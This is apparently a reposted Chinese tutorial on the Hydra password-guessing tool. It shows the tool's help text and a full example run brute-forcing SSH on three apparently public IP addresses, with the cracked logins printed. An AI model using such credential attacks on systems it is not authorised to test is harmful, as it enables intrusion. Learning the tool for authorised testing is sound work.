暴力破解工具Hydra
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了暴力破解工具Hydra相关的知识,希望对你有一定的参考价值。
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]
Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ‘:‘ to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don‘t use in military or secret service organizations, or for illegal purposes.
Example: hydra -l user -P passlist.txt ftp://192.168.0.1
# 待破解的主机列表
[email protected]:~# cat serverlist
189.37.178.1 189.37.178.216 189.37.178.98
# 破解主机的ssh用户名密码
[email protected]:~# hydra -L ssh_user.dic -P ssh_pass.dic -t 5 -vV -o ./output.txt -e ns -M serverlist ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06 [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] max 5 tasks per 3 servers, overall 64 tasks, 36 login tries (l:4/p:9), ~0 tries per task [DATA] attacking service ssh on port 22 [VERBOSE] Resolving addresses ... done [INFO] Testing if password authentication is supported by ssh://189.37.178.47:22 [INFO] Successful, password authentication is supported by ssh://189.37.178.47:22 [INFO] Testing if password authentication is supported by ssh://189.37.178.216:22 [INFO] Successful, password authentication is supported by ssh://189.37.178.216:22 [INFO] Testing if password authentication is supported by ssh://189.37.178.98:22 [INFO] Successful, password authentication is supported by ssh://189.37.178.98:22 [ATTEMPT] target 189.37.178.1 - login "root" - pass "root" - 1 of 36 [child 0] [ATTEMPT] target 189.37.178.216 - login "root" - pass "root" - 1 of 36 [child 1] [ATTEMPT] target 189.37.178.98 - login "root" - pass "root" - 1 of 36 [child 2] [ATTEMPT] target 189.37.178.1 - login "root" - pass "" - 2 of 36 [child 3] [ATTEMPT] target 189.37.178.216 - login "root" - pass "" - 2 of 36 [child 4] [ATTEMPT] target 189.37.178.98 - login "root" - pass "" - 2 of 36 [child 5] [ATTEMPT] target 189.37.178.1 - login "root" - pass "123456" - 3 of 36 [child 6] [ATTEMPT] target 189.37.178.216 - login "root" - pass "123456" - 3 of 36 [child 7] [ATTEMPT] target 189.37.178.98 - login "root" - pass "123456" - 3 of 36 [child 8] [ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" - 4 of 36 [child 9] [ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" - 4 of 36 [child 10] [ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" - 4 of 36 [child 11] [ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" - 5 of 36 [child 12] [ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" - 5 of 36 [child 13] [ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" - 5 of 36 [child 14] [ATTEMPT] target 189.37.178.1 - login "root" - pass "111111" - 6 of 36 [child 3] [ATTEMPT] target 189.37.178.216 - login "root" - pass "111111" - 6 of 36 [child 4] [22][ssh] host:189.37.178.98 login: root [ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" - 10 of 36 [child 5] [ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - 11 of 36 [child 2] [ATTEMPT] target 189.37.178.98 - login "admin" - pass "123456" - 12 of 36 [child 8] [ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" - 13 of 36 [child 14] [ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" - 14 of 36 [child 11] [ATTEMPT] target 189.37.178.98 - login "admin" - pass "111111" - 15 of 36 [child 5] [ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" - 7 of 36 [child 12] [ATTEMPT] target 189.37.178.1 - login "root" - pass "222222" - 8 of 36 [child 3] [ATTEMPT] target 189.37.178.1 - login "root" - pass "444444" - 9 of 36 [child 6] [ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" - 10 of 36 [child 0] [ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - 11 of 36 [child 9] [ATTEMPT] target 189.37.178.1 - login "admin" - pass "123456" - 12 of 36 [child 9] [ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" - 16 of 36 [child 2] [ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" - 7 of 36 [child 7] [ATTEMPT] target 189.37.178.216 - login "root" - pass "222222" - 8 of 36 [child 4] [ATTEMPT] target 189.37.178.216 - login "root" - pass "444444" - 9 of 36 [child 13] [ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" - 10 of 36 [child 10] [ATTEMPT] target 189.37.178.98 - login "admin" - pass "222222" - 17 of 36 [child 5] [ATTEMPT] target 189.37.178.98 - login "admin" - pass "444444" - 18 of 36 [child 14] [ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" - 19 of 36 [child 8] [ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - 20 of 36 [child 11] [ATTEMPT] target 189.37.178.98 - login "pentest" - pass "123456" - 21 of 36 [child 2] [ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" - 13 of 36 [child 0] [ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" - 14 of 36 [child 9] [ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" - 22 of 36 [child 5] [ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" - 23 of 36 [child 14] [ATTEMPT] target 189.37.178.98 - login "pentest" - pass "111111" - 24 of 36 [child 11] [ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" - 25 of 36 [child 8] [ATTEMPT] target 189.37.178.1 - login "admin" - pass "111111" - 15 of 36 [child 12] [ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" - 16 of 36 [child 3] [ATTEMPT] target 189.37.178.1 - login "admin" - pass "222222" - 17 of 36 [child 6] [ATTEMPT] target 189.37.178.98 - login "pentest" - pass "222222" - 26 of 36 [child 2] [ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - 11 of 36 [child 7] [ATTEMPT] target 189.37.178.216 - login "admin" - pass "123456" - 12 of 36 [child 4] [ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" - 13 of 36 [child 13] [ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" - 14 of 36 [child 10] [ATTEMPT] target 189.37.178.98 - login "pentest" - pass "444444" - 27 of 36 [child 5] [ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" - 28 of 36 [child 11] [ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - 29 of 36 [child 14] [ATTEMPT] target 189.37.178.98 - login "oracle" - pass "123456" - 30 of 36 [child 8] [ATTEMPT] target 189.37.178.1 - login "admin" - pass "444444" - 18 of 36 [child 9] [ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" - 19 of 36 [child 0] [ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" - 31 of 36 [child 2] [ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - 20 of 36 [child 12] [ATTEMPT] target 189.37.178.1 - login "pentest" - pass "123456" - 21 of 36 [child 3] [ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" - 22 of 36 [child 6] [ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" - 23 of 36 [child 12] [22][ssh] host:189.37.178.1 login: pentest password: 123456 [ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" - 28 of 36 [child 3] [ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" - 32 of 36 [child 5] [ATTEMPT] target 189.37.178.98 - login "oracle" - pass "111111" - 33 of 36 [child 11] [ATTEMPT] target 189.37.178.98 - login "oracle" - pass "222222" - 35 of 36 [child 14] [ATTEMPT] target 189.37.178.98 - login "oracle" - pass "444444" - 36 of 36 [child 8] [STATUS] attack finished for189.37.178.98 (waiting for children to complete tests) [ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - 29 of 36 [child 9] [ATTEMPT] target 189.37.178.1 - login "oracle" - pass "123456" - 30 of 36 [child 9] [ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" - 31 of 36 [child 0] [ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" - 32 of 36 [child 12] [ATTEMPT] target 189.37.178.1 - login "oracle" - pass "111111" - 33 of 36 [child 6] [ATTEMPT] target 189.37.178.216 - login "admin" - pass "111111" - 15 of 36 [child 4] [ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" - 16 of 36 [child 13] [ATTEMPT] target 189.37.178.216 - login "admin" - pass "222222" - 17 of 36 [child 10] [ATTEMPT] target 189.37.178.1 - login "oracle" - pass "222222" - 35 of 36 [child 3] [ATTEMPT] target 189.37.178.216 - login "admin" - pass "444444" - 18 of 36 [child 4] [ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" - 19 of 36 [child 13] [ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - 20 of 36 [child 10] [ATTEMPT] target 189.37.178.1 - login "oracle" - pass "444444" - 36 of 36 [child 0] [STATUS] attack finished for189.37.178.1 (waiting for children to complete tests) [ATTEMPT] target 189.37.178.216 - login "pentest" - pass "123456" - 21 of 36 [child 1] [ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" - 22 of 36 [child 4] [ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" - 23 of 36 [child 1] [ATTEMPT] target 189.37.178.216 - login "pentest" - pass "111111" - 24 of 36 [child 1] [ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" - 25 of 36 [child 7] [ATTEMPT] target 189.37.178.216 - login "pentest" - pass "222222" - 26 of 36 [child 1] [ATTEMPT] target 189.37.178.216 - login "pentest" - pass "444444" - 27 of 36 [child 7] [ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" - 28 of 36 [child 1] [ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" - 29 of 36 [child 7] [22][ssh] host:189.37.178.216 login: oracle password: oracle [STATUS] attack finished for189.37.178.216 (waiting for children to complete tests) 3 of 3 targets successfully completed, 3 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表
[email protected]:~# cat output.txt # Hydra v8.2 run at 2017-08-06 23:14:40 on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t 5 -vV -o ./output.txt -e ns -M serverlist ssh) [22][ssh] host: 189.37.178.98 login: root [22][ssh] host: 189.37.178.1 login: pentest password: 123456 [22][ssh] host: 189.37.178.216 login: oracle password: oracle
以上是关于暴力破解工具Hydra的主要内容,如果未能解决你的问题,请参考以下文章